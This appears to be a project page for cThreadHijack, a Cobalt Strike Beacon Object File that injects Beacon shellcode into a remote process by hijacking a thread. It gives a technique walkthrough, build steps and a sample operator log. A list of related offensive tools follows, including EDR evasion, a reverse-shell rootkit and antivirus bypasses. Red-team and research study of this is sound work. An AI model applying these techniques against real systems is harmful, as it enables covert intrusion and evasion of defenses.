Beacon Object File (BOF) for remote process injection via thread hijacking

Overview

cThreadHijack

     ___________.__                              .______ ___ .__     __               __    
  ___\__    ___/|  |_________   ____ _____     __| _/   |   \|__|   |__|____    ____ |  | __
_/ ___\|    |   |  |  \_  __ \_/ __ \\__  \   / __ /    ~    \  |   |  \__  \ _/ ___\|  |/ /
\  \___|    |   |   Y  \  | \/\  ___/ / __ \_/ /_/ \    Y    /  |   |  |/ __ \\  \___|    < 
 \___  >____|   |___|  /__|    \___  >____  /\____ |\___|_  /|__/\__|  (____  /\___  >__|_ \
     \/              \/            \/     \/      \/      \/    \______|    \/     \/     \/

Beacon Object File (BOF) for remote process injection, via thread hijacking, without spawning a remote thread. Accompanying blog can be found here. cThreadHijack works by injecting raw Beacon shellcode, generated via a user-supplied listener argument, into a remote process, defined by the user-supplied PID argument, via VirtualAllocEx and WriteProcessMemory. Then, instead of spawning a new remote thread via CreateRemoteThread or other APIs, cThreadHijack identifies the first enumerated thread in the target process, suspends it, and retrieves the contents of the thread's CPU state via a CONTEXT structure. Then, the RIP register member of the CONTEXT structure (on 64-bit systems) is manipulated to point to the address of the aforementioned remote Payload. Prior to execution, a routine is added to wrap the Beacon shellcode inside of a call to CreateThread - giving Beacon its own thread to work in, with this thread being locally spawned, versus being spawned remotely. The CreateThread routine is also wrapped in an NtContinue function call routine, allowing restoration of the previously hijacked thread without crashing the remote process. Beacon payloads for cThreadHijack are generated with a 'thread' exit function, allowing process continuation after the Beacon has been exited. Beacon listener names, when containing a space, must be placed in quotes.

BUILDING:

  1. On a Windows machine, open a x64 Native Tools Command Prompt for VS prompt. This can be done by pressing the Windows key and typing x64 Native Tools and selecting the prompt.
  2. Change directory to C:\path\to\cThreadHijack.
  3. nmake -f Makefile.msvc build
  4. Load cThreadHijack.cna through the Cobalt Strike Script Console with load /path/to/cThreadHijack.cna

USAGE:

cThreadHijack PID LISTENER_NAME

beacon> cThreadHijack 7340 TESTING
[+] host called home, sent: 268433 bytes
[+] received output:
[+] Target process PID: 7340

[+] received output:
[+] Opened a handle to PID 7340

[+] received output:
[+] Found a thread in the target process! Thread ID: 10212

[+] received output:
[+] Suspending the targeted thread...

[+] received output:
[+] Wrote Beacon shellcode to the remote process!

[+] received output:
[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x201f4ab0000 inside of the remote process!

[+] received output:
[+] Size of NtContinue routine: 64 bytes
[+] Size of CONTEXT structure: 1232 bytes
[+] Size of stack alignment routine: 4
[+] Size of CreateThread routine: 64
[+] Size of shellcode: 261632 bytes

[+] received output:
[+] Wrote payload to buffer to previously allocated buffer inside of!

[+] received output:
[+] Current RIP: 0x7ffa55df69a4

[+] received output:
[+] Successfully pointed the target thread's RIP register to the shellcode!

[+] received output:
[+] Current RIP: 0x201f4ab0000

[+] received output:
[+] Resuming the thread! Please wait a few moments for the Beacon payload to execute...
Owner
Connor McGarr
OSCP, OSCE | Exploit Development, Vulnerability Research, and Red Teaming.
Connor McGarr
A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.

WdToggle A Proof of Concept Cobalt Strike Beacon Object File which uses direct system calls to enable WDigest credential caching and circumvent Creden

Outflank B.V. 192 Jun 16, 2022
Section Mapping Process Injection (secinject): Cobalt Strike BOF

Section Mapping Process Injection (secinject): Cobalt Strike BOF Beacon Object File (BOF) that leverages Native APIs to achieve process injection thro

null 69 Jun 23, 2022
POCs for Shellcode Injection via Callbacks

Callback_Shellcode_Injection POCs for Shellcode Injection via Callbacks. Working APIs 1, EnumTimeFormatsA Works 2, EnumWindows Works 3, EnumD

Chaitanya Haritash 297 Jun 21, 2022
Cobalt Strike BOF Files with Nim!

BOF-Nim oh yeah baby I have an inkling it's possible, right now the problem seems to be getting the go function to be present in the Symbol table. No

byt3bl33d3r 59 Jun 22, 2022
SPAWN - Cobalt Strike BOF

Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.

Bobby Cooke 329 Jun 27, 2022
PoC memory injection detection agent based on ETW, for offensive and defensive research purposes

TiEtwAgent - ETW-based process injection detection This project was created to research, build and test different memory injection detection use cases

Filip Olszak 135 Jun 17, 2022
Remote Download and Memory Execute for shellcode framework

RmExecute Remote Download and Memory Execute for shellcode framework 远程下载并内存加载的ShellCode框架,暂不支持X64 参(抄)考(袭)项目 windows下shellcode提取模板的实现 主要抄袭来源,直接使用这位大佬

null 39 Jun 20, 2022
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 76 Jun 18, 2022
PoC: Exploit 32-bit Thread Snapshot of WOW64 to Take Over $RIP & Inject & Bypass Antivirus HIPS (HITB 2021)

wowInjector Inject payload to WOW64(Windows 32 on Windows 64) process via exploit 32-bit thread snapshot. This trick makes us possible to do malicious

Sheng-Hao Ma 134 Jun 27, 2022
You Only Look Twice: Rapid Multi-Scale Object Detection In Satellite Imagery

YOLT You Only Look Twice: Rapid Multi-Scale Object Detection In Satellite Imagery As of 24 October 2018 YOLT has been superceded by SIMRDWN YOLT is an

CosmiQ Works 595 Jun 20, 2022
Small header-only C++ library that helps to initialize Vulkan instance and device object

Vulkan Extensions & Features Help, or VkExtensionsFeaturesHelp, is a small, header-only, C++ library for developers who use Vulkan API.

Adam Sawicki 10 Apr 13, 2022
A simple YAML parser which produces a Node Tree Object representation of YAML Documents

A simple YAML parser which produces a Node Tree Object representation of YAML Documents and includes a find method to locate individual Nodes within the parsed Node Tree.

Timothy Rule 1 Oct 17, 2021
convert elf file to single c/c++ header file

elf-to-c-header Split ELF to single C/C++ header file

Musa Ünal 2 Nov 4, 2021
Block unauthorized users from logging in via RDP.

RDPBlocker is a tool to prevent brute force password cracking against RDP (Remote Desktop Protocol) services. This tool is developed by cpp

null 41 May 19, 2022
Extended Process List (Search functionality)

Extended Process List (ps with search) (64-bit only) Added search functionality for process listing. Credits to @odzhan, Alfie Champion (@ajpc500), Sy

snoom 26 May 7, 2022
fpicker is a Frida-based fuzzing suite supporting various modes (including AFL++ in-process fuzzing)

fpicker fpicker is a Frida-based fuzzing suite that offers a variety of fuzzing modes for in-process fuzzing, such as an AFL++ mode or a passive traci

Dennis Heinze 176 Jun 18, 2022
x64 Windows PatchGuard bypass, register process-creation callbacks from unsigned code

NoPatchGuardCallback x64 Windows PatchGuard bypass, register process-creation callbacks from unsigned code Read: https://www.godeye.club/2021/05/22/00

Kento Oki 116 Jun 15, 2022
Analyze patches in a process for investigation or repairment purposes.

HookHunter Analyze patches in a process for investigation or repairment purposes. Details HookHunter is a multi-purpose Windows tool that can search a

null 175 Jun 20, 2022
C/C++ Windows Process Injector for Educational Purposes.

ProcessInjector C/C++ Windows Process Injector for Educational Purposes. What does this software do? This is a simple process injector that uses the C

Berat Çağrı Eroğlu 8 May 3, 2022